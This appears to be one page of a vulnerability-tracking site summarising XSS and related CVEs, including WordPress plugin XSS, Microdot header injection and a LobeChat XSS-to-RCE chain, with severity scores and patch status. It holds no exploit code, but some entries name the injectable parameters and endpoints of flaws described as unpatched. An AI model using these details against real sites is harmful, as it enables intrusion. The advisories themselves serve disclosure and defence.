HTTP response splitting in Microdot's Response.set_cookie() method allows header injection attacks when an attacker-controlled XSS payload reaches the server and is stored as a cookie value. The vulnerability stems from unsanitized carriage return and linefeed characters (\r\n) in cookie parameters, enabling an attacker to inject arbitrary HTTP headers. Exploitation requires prior client-side compromise (XSS), limiting the attack to a single compromised client per incident.

XSS
NVD GitHub
EPSS 0% CVSS 6.2
MEDIUM This Month

Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.

Python Command Injection XSS +1
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Traccar 6.11.1 through 6.12.x allows low-privilege authenticated users to inject malicious HTML into device, geofence, and driver name fields, which is then rendered unescaped in email notification templates sent to other users. This enables phishing attacks or spoofed email content delivered via the application's notification system. The vulnerability is fixed in version 6.13.0.

XSS Traccar
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM POC This Month

AmazCart CMS 3.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search functionality. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Amazcart Cms
NVD Exploit-DB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Royal Addons for Elementor's Instagram Feed widget allows authenticated contributors and above to inject arbitrary JavaScript via the 'instagram_follow_text' setting, which executes in the browsers of all users viewing the affected page. The vulnerability affects all versions up to 1.7.1056 and requires the Instagram Feed widget to be previously configured with a valid access token by an administrator. No public exploit code or active exploitation has been confirmed at this time.

XSS WordPress Elementor
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in WP Carousel Free plugin for WordPress affects all versions up to 2.7.10, allowing authenticated attackers with Contributor-level access to inject arbitrary JavaScript via malformed carousel container IDs in the fancybox `data-caption` attribute. The vulnerability arises when the fancybox configuration script fails to initialize due to unsanitized DOM selectors, causing the bundled fancybox library v3.5.7 to fall back to unsafe default caption handling that renders HTML directly. This enables script execution in the context of site visitors clicking images in the compromised carousel lightbox. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 7.2
HIGH This Week

Stored Cross-Site Scripting in Royal Elementor Addons WordPress plugin allows unauthenticated remote attackers to inject malicious scripts that execute in victim browsers. The vulnerability exists in all versions up to 1.7.1056 due to a publicly leaked static nonce that bypasses authentication checks for the wpr_update_form_action_meta AJAX endpoint. Combined with insufficient input sanitization on the 'status' parameter, attackers can inject persistent XSS payloads without authentication. EPSS data not provided; no CISA KEV listing indicates no confirmed widespread exploitation at time of analysis.

XSS WordPress Elementor
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in WP-Clippy plugin for WordPress up to version 1.0.0 allows authenticated attackers with contributor-level access or higher to inject arbitrary JavaScript via the `clippy` shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page. No public exploit code or active exploitation has been identified at the time of analysis.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Simple Owl Shortcodes WordPress plugin versions up to 2.1.1 allows authenticated contributors and above to inject arbitrary JavaScript via the 'num' attribute of the 'owls_wrapper' shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been confirmed at the time of analysis.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in Blog Settings plugin for WordPress versions up to 1.0 allows unauthenticated attackers to inject arbitrary JavaScript via the 'page' parameter due to insufficient input sanitization and output escaping. An attacker must trick a user into clicking a malicious link to execute the injected script in the victim's browser session, potentially compromising WordPress admin credentials or site functionality.

XSS WordPress
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin up to version 3.5.3 allows authenticated attackers with contributor-level access to inject arbitrary JavaScript into pages via the 'separatorIconSVG' parameter, executing malicious scripts whenever users view affected pages. The vulnerability stems from insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at the time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 5.5
MEDIUM This Month

Stored cross-site scripting (XSS) in PublishPress Future WordPress plugin versions up to 4.10.0 allows authenticated administrators to inject arbitrary JavaScript via the 'wrapper' attribute of the [futureaction] shortcode, which executes in the browsers of all users viewing the affected page. The vulnerability stems from insufficient sanitization: the plugin uses esc_html() to escape the attribute value but then passes it as a bare HTML tag name in a sprintf() call, permitting event handler injection through spaces. Since administrators can delegate this functionality to lower-privileged contributors, the attack surface extends beyond high-privilege users.

XSS WordPress
NVD GitHub
Prev Page 20 of 432 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy